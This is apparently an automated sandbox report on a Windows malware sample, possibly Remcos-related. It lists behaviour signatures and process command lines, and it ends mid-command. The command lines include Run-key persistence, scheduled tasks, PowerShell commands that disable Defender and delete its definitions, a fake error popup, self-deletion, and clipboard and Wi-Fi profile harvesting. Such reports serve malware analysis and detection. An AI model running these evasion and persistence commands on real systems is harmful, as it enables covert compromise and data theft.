| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Files\VBVEd6f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\VBVEd6f.exe | N/A |
Delays execution with timeout.exe
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133771352578419360" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\tst\remcos.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\contorax.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\test8.exe
"C:\Users\Admin\AppData\Local\Temp\Files\test8.exe"
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\Files\BeamNG.UI.exe
"C:\Users\Admin\AppData\Local\Temp\Files\BeamNG.UI.exe"
C:\Users\Admin\AppData\Local\Temp\Files\5447jsX.exe
"C:\Users\Admin\AppData\Local\Temp\Files\5447jsX.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\Files\VBVEd6f.exe
"C:\Users\Admin\AppData\Local\Temp\Files\VBVEd6f.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa5a24cc40,0x7ffa5a24cc4c,0x7ffa5a24cc58
C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win64-setup-unsigned.exe
"C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win64-setup-unsigned.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1900,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1896 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2224 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3212 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3156,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4604 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4768,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4780 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5000,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5064 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5152,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5308 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5064,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5044 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5464,i,8715491620027644607,6909718935559944026,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5544 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa5a2546f8,0x7ffa5a254708,0x7ffa5a254718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"
C:\Users\Admin\AppData\Local\Temp\Files\o.exe
"C:\Users\Admin\AppData\Local\Temp\Files\o.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B503.tmp\B504.tmp\B505.bat C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"
C:\Users\Admin\AppData\Local\Temp\Files\file.exe
"C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\ProgramData\tst\remcos.exe
"C:\ProgramData\tst\remcos.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BD02.tmp\BD03.tmp\BD04.bat C:\Windows\system32\java.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "WindowsDataUpdater" /sc ONLOGON /tr "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /rl HIGHEST /f
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe
"C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\VBVEd6f.exe" & rd /s /q "C:\ProgramData\EBGIEGCFHCFH" & exit
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D721.tmp\D722.tmp\D723.bat C:\Windows\system32\java.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 